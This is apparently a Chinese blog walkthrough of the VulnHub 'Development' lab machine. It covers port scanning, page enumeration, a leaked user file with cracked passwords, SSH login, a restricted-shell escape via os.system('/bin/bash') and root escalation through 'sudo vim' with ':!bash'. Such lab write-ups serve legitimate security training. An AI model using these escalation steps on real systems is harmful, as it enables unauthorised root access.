漏洞复现 -- Development

一、靶机地址

https://www.vulnhub.com/entry/digitalworldlocal-development,280/

二、漏洞复现

sudo arp-scan -l

nmap -p- 192.168.159.156 --min-rate=5000

http://192.168.159.156:8080

http://192.168.159.156:8080/html_pages

http://192.168.159.156:8080/about.html
http://192.168.159.156:8080/config.html
http://192.168.159.156:8080/default.html
http://192.168.159.156:8080/development.html
http://192.168.159.156:8080/downloads.html
http://192.168.159.156:8080/error.html
http://192.168.159.156:8080/html_pages
http://192.168.159.156:8080/index.html
http://192.168.159.156:8080/login.html
http://192.168.159.156:8080/register.html
http://192.168.159.156:8080/tryharder.html
http://192.168.159.156:8080/uploads.html
在development.html页面发现内容

http://192.168.159.156:8080/development.html

http://192.168.159.156:8080/hackersecretpage

未发现有用信息

查看development网页源代码
<!-- You tried harder! Visit ./developmentsecretpage. -->

http://192.168.159.156:8080/developmentsecretpage
提示访问Patrick的php页面,同时知道有一个用户叫Patrick

根据超链接继续访问,发现有一个站点地图

访问站点地图后,测试登出

重新登录测试

基于关键字搜索查询
查看存在本地文件包含slogin_lib.inc.php
http://192.168.159.156:8080/developmentsecretpage/slog_users.txt
解密:
admin, 3cb1d13bb83ffff2defe8d1443d3a0eb
intern, 12345678900987654321
patrick, P@ssw0rd25
qiu, qiu

ssh intern@192.168.159.156

切换成tty终端后查看文件,提示我们必须与用户 Patrick 进一步合作
echo os.system('/bin/bash')
cat local.txt
cat work.txt

切换为Patrick账号
su - patrick
查看patrick账号权限
sudo -l

vim提权
sudo vim

输入如下内容
:!bash   或者
:!sh

查看已经切换为root权限
id

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值